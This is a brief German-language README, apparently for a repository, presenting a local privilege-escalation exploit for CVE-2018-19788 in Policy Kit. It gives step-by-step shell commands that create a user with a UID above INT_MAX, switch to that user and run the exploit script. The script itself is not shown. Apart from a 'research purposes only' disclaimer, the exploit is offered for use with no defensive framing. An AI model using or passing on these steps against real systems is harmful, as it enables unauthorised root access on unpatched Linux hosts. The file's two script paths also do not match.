
Lächerlich einfacher Exploit für CVE-2018-19788
Trivialer Exploit für CVE-2018-19788
Um dies zu verwenden, müssen Sie entweder einen Benutzer mit einer UID > INT_MAX in Policy Kit erstellen oder bereits einen Benutzer mit niedrigen Rechten und einer solchen UID haben.
Die UID kann bei der Benutzererstellung wie folgt angegeben und vor der Ausführung des Skripts verwendet werden:
$ useradd -u 4000000001 PrivEsc
$ passwd PrivEsc
$ su PrivEsc
$ chmod +x /tmp/CVE-2018-19788_PrivEsc.sh
$ ./tmp/CVE-2018-19788_PrivEsc.sh
Bitte beachten Sie, dass dies nur zu Forschungszwecken dient und Sie für die Nutzung von Code aus diesem oder anderen Repositories selbst verantwortlich sind, wie es der gesunde Menschenverstand gebietet.